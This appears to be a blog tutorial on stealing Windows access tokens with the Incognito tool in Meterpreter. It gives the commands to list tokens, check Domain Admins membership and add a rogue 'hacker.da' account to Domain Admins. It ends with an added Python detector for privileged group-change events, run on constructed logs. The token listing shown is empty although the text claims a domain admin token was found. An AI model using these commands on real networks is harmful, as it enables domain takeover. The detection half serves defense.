PrivEsc: Stealing Windows Access Tokens – Incognito

If an attacker is able to get SYSTEM level access to a workstation, for example by compromising a local administrator account, and a Domain Administrator account is logged in to that machine, then it may be possible for the attacker to simply read the administrator's access token in memory and steal it, allowing them to impersonate that account. There is a tool available to do this, called Incognito.

As with Mimikatz, it's possible to either call the incognito.exe file directly or load it as an extension into an active Meterpreter shell. To load it into Meterpreter, simply run:

meterpreter > use incognito

At this point you can run a command to list which tokens are available on the target machine:

meterpreter > list_tokens -u

The expected output from this command will be something similar to the following:

[*] Enumerating tokens
[*] Listing unique users found

Delegation Tokens Available

Impersonation Tokens Available

As you can see in this example, I've been lucky enough to find the token for a domain admin account. Of course, the user name doesn't necessarily disclose whether a user is a domain admin or not, but you could always drop into a shell with the "shell" command and run:

net groups "Domain Admins" /domain

Okay, once you've found a target account you can utilize it to create your own domain administrator account with the following command from within Incognito (either the Meterpreter shell or the .exe):

add_group_user "Domain Admins" hacker.da
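That final step is recorded on the domain controller as a group membership change, which is where a defender can catch it. The following is an added example, not code from the original post or from Incognito: a small Python detector that parses constructed sample Windows Security events (Event IDs 4728, 4732 and 4756, "member added to a security-enabled group") and flags additions to privileged groups such as Domain Admins. The sample log lines, the account names and the CORP domain are all constructed.

```python
import re

# Constructed sample events (not real telemetry). Each line is one Windows
# Security event flattened to key=value pairs, as a SIEM export might look.
SAMPLE_EVENTS = [
    "EventID=4624 SubjectUserName=- TargetUserName=jsmith TargetDomainName=CORP LogonType=2",
    "EventID=4728 SubjectUserName=admin.da SubjectDomainName=CORP "
    "MemberName=CN=hacker.da,CN=Users,DC=corp,DC=local TargetUserName=Domain Admins TargetDomainName=CORP",
    "EventID=4732 SubjectUserName=admin.da SubjectDomainName=CORP "
    "MemberName=CN=svc-backup,CN=Users,DC=corp,DC=local TargetUserName=Administrators TargetDomainName=BUILTIN",
    "EventID=4728 SubjectUserName=hr.lead SubjectDomainName=CORP "
    "MemberName=CN=newhire,CN=Users,DC=corp,DC=local TargetUserName=Marketing TargetDomainName=CORP",
]

# Event IDs for "member added to security-enabled group": global, local, universal.
MEMBER_ADDED_EVENTS = {"4728", "4732", "4756"}
# Groups whose membership changes should always be reviewed.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}

# A value runs until the next " Key=" token, so values containing spaces
# ("Domain Admins") or '=' signs (distinguished names) are kept intact.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))

def member_cn(distinguished_name):
    """Extract the leaf CN (the account name) from a DN such as CN=x,CN=Users,..."""
    match = re.match(r"CN=([^,]+)", distinguished_name)
    return match.group(1) if match else distinguished_name

def find_privileged_group_changes(lines):
    """Return one alert per addition to a privileged group."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") not in MEMBER_ADDED_EVENTS:
            continue
        group = event.get("TargetUserName", "")
        if group not in PRIVILEGED_GROUPS:
            continue
        alerts.append({
            "event_id": event["EventID"],
            "actor": f"{event.get('SubjectDomainName', '')}\\{event.get('SubjectUserName', '')}",
            "member": member_cn(event.get("MemberName", "")),
            "group": group,
        })
    return alerts

if __name__ == "__main__":
    for alert in find_privileged_group_changes(SAMPLE_EVENTS):
        print(f"[ALERT] {alert['actor']} added {alert['member']} to {alert['group']} (Event {alert['event_id']})")
```

On the sample input only the Domain Admins and Administrators additions are reported; the routine Marketing change and the logon event are ignored.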
